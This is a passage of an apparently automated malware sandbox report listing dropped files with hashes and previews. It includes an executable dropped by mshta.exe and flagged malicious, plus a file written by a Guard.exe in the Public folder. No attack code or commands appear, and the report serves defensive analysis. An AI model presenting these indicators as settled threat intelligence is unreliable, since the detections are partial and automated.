                                                                              Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ghep1[1]

                                                                              Download File
                                                                              Process:C:\Windows\System32\mshta.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):85804
                                                                              Entropy (8bit):4.948174305592025
                                                                              Encrypted:false
                                                                              SSDEEP:768:fsnZcnsXsnZcnsywHAwE9IHeyxzwcBhiI2eCeklhe98eKr5ee/qS8MOeK7/r0EYo:EZcbZcnBZcdZc
                                                                              MD5:6DCA71F1033503CECF5E1E4C11947AFE
                                                                              SHA1:7ADB1B0E80B9CC7FAF8ADCAA2987852137B9358F
                                                                              SHA-256:CB88524BDA1EA42618A41985C8D3BBE278C9BD8F9D6AC2BDFE7BDAAF4B2B1886
                                                                              SHA-512:1CDC3F51A8570BDE3E956AC9D36015DC7866C30B8BB31956BFE22C810C131774B0322969F7EF995461F82096342338BB1AEB24E66BA204670BB4EDF9AA344599
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 39%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..W..W..C...V..C...U..C...C..C...P..W..s..C...V..C.|.V..C...V..RichW..........................PE..L...C.05............................@........ ....@..........................`......._....@...... ...........................0..P....@.......................P..@.......T............................................0...............................text...t........................... ..`.data...p.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..@....P.......&..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):0.34726597513537405
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlll:Nll
                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                              Malicious:false
                                                                              Preview:@...e...........................................................

                                                                              C:\Users\user\AppData\Local\Temp\MSIb1993.LOG

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):246
                                                                              Entropy (8bit):3.5097251598291805
                                                                              Encrypted:false
                                                                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8sKDawW9:Qw946cPbiOxDlbYnuRKS8
                                                                              MD5:FB34BE5D1CAFA73FBD48CEA1A5B88092
                                                                              SHA1:7E7B86233E28439EB976E0B929AB3E6DF44BBC41
                                                                              SHA-256:F98741F9A1607C46B01908053B189D6CD7C6EC145009BD2BC5EAE8244EC45715
                                                                              SHA-512:CA62AF0BAA4DC3A489F6750213C29BD8C4439BFA540828088B318E1B4D75BA1DAD712369EA4060E17CD1837CE06F290E4C5B0FFE52A3F8746C7F28C3D6FB8BC7
                                                                              Malicious:false
                                                                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.8./.1.2./.2.0.2.4. . .1.5.:.0.0.:.2.7. .=.=.=.....

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ab0bsbk.x4u.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kt0w4c1.hh0.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csjszw4o.lc5.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdykrnrj.xyx.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psbuui0q.krg.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rw2nf2ka.alf.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1okb2hx.b4i.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xp2xk12x.d32.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-18 15-00-20-420.log

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:ASCII text, with very long lines (393)
                                                                              Category:dropped
                                                                              Size (bytes):16525
                                                                              Entropy (8bit):5.345946398610936
                                                                              Encrypted:false
                                                                              SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                              MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                              SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                              SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                              SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                              Malicious:false
                                                                              Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):15114
                                                                              Entropy (8bit):5.341858590640334
                                                                              Encrypted:false
                                                                              SSDEEP:384:ZYtaFrULDcVHMGpbcSC41nMhlK3PSMQao7WCgsAaOqOmo9dl/Smb3u3OvcWR3e23:oid
                                                                              MD5:45EC35C829121F7AE685D0A4D8B1BAFC
                                                                              SHA1:9778B31FE9C02ACF18720653D4C7379AF65290E0
                                                                              SHA-256:D414C185BB8871D6D007FBE5BB67470C736C0FA52762594D83C59FB6DF9012E9
                                                                              SHA-512:580E50D34EC03A4C35C500F6A0A2A0BEF2B442BE7B992C6F639EBB86DFB6D2CA838F31FC925A3921E8EC7794EBF1B2BEF888D99759CE5AA3AA1B633334618454
                                                                              Malicious:false
                                                                              Preview:SessionID=6295eab8-7103-49ba-b642-32c16d7cda25.1734552020431 Timestamp=2024-12-18T15:00:20:431-0500 ThreadID=8004 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=6295eab8-7103-49ba-b642-32c16d7cda25.1734552020431 Timestamp=2024-12-18T15:00:20:431-0500 ThreadID=8004 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=6295eab8-7103-49ba-b642-32c16d7cda25.1734552020431 Timestamp=2024-12-18T15:00:20:432-0500 ThreadID=8004 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=6295eab8-7103-49ba-b642-32c16d7cda25.1734552020431 Timestamp=2024-12-18T15:00:20:432-0500 ThreadID=8004 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=6295eab8-7103-49ba-b642-32c16d7cda25.1734552020431 Timestamp=2024-12-18T15:00:20:432-0500 ThreadID=8004 Component=ngl-lib_NglAppLib Description="SetConf

                                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):29752
                                                                              Entropy (8bit):5.382643048227498
                                                                              Encrypted:false
                                                                              SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rY:JCJ
                                                                              MD5:96B40FB264DA890C10E4A04C8486F961
                                                                              SHA1:5B6D2CB53AFFD52526455F782879CC1F33D8B49D
                                                                              SHA-256:12D96F3B1F5DE447471A9FC99B1E47564202269F55C62BBC0206CB6349327AD5
                                                                              SHA-512:BCE9FCA8EC58EC9E518C4D00EE3EB1AB2D7450EA316BB1ACFB4B7AEFC348A5D6A8AFA11075CB79DEA226E1E04B5763428379FAE414510810C95850B4C4A5A0BF
                                                                              Malicious:false
                                                                              Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\473eb04c-c43e-4c1b-b8df-5e8dbf6f3c43.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                              Category:dropped
                                                                              Size (bytes):1419751
                                                                              Entropy (8bit):7.976496077007677
                                                                              Encrypted:false
                                                                              SSDEEP:24576:/b5mOWL07oYGZiYIGNPZdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:D5bWLxYGZiZGH3mlind9i4ufFXpAXkru
                                                                              MD5:7FB8C020A0266753ACC0B69FA92C3C55
                                                                              SHA1:D9211BBA529E180E5BE279F3879F8449590F7648
                                                                              SHA-256:AF4940C6022D857E07BA5C9075960E95C595459E3DCE0F57881311021F4095D3
                                                                              SHA-512:AEB38E3277247703294B2FB708A720B6AA85A6EE77284B19FE3A2A2F6FD735E1052A1B794D5EF175AB5BE48D15B69A1AB920812DC7C5B9143FDC3AEBF3902198
                                                                              Malicious:false
                                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\a8e3863e-1ca2-4d1c-808b-249ed81b153a.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                              Category:dropped
                                                                              Size (bytes):386528
                                                                              Entropy (8bit):7.9736851559892425
                                                                              Encrypted:false
                                                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                              Malicious:false
                                                                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\ce9ee442-6e2a-40d2-b669-0555b5fb467c.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                              Category:dropped
                                                                              Size (bytes):1407294
                                                                              Entropy (8bit):7.97605879016224
                                                                              Encrypted:false
                                                                              SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLcGZtwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLcGZa
                                                                              MD5:22B260CB8C51C0D68C6550E4B061E25A
                                                                              SHA1:DF9A5999C58A8D5ADBB3F8D1111EAB9E4778637E
                                                                              SHA-256:DAB1231CC22DAB591EBB91C853E3EE41C10D3DA85D2EFAB67E9A52CCB3A3A5A0
                                                                              SHA-512:503218D83C511A7F7CEA8BC171921D1435664B964F01A8C77DC0F4D0196DD2815D9444DA98278E1369552D004E9B091DD9B89663209F0C52ACB97FCE6AFFE7A9
                                                                              Malicious:false
                                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\e3b03b4b-f058-47e3-bb84-488a2c16b1af.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                              Category:dropped
                                                                              Size (bytes):758601
                                                                              Entropy (8bit):7.98639316555857
                                                                              Encrypted:false
                                                                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                              MD5:3A49135134665364308390AC398006F1
                                                                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                              Malicious:false
                                                                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                              C:\Users\user\AppData\Local\WordGenius Technologies\G

                                                                              Download File
                                                                              Process:C:\Users\Public\Guard.exe
                                                                              File Type:ASCII text, with very long lines (1266)
                                                                              Category:dropped
                                                                              Size (bytes):1240100
                                                                              Entropy (8bit):5.144277296271024
                                                                              Encrypted:false
                                                                              SSDEEP:12288:D8V+jcfSgyuH7Kixj+UXk8pL6OvsEmeXBWD4LkPq0e718m3UDd:DcB7HxicaEmEQD3I1jUZ
                                                                              MD5:078A35D34863F9421F702C3044DA8A1F
                                                                              SHA1:1D34A5EF73992231F1E5857A462359596647E0F6
                                                                              SHA-256:6E32AE2A7776564163BE157BAEE93FCB156A5030D620C71D9FCF33D9A7CBC925
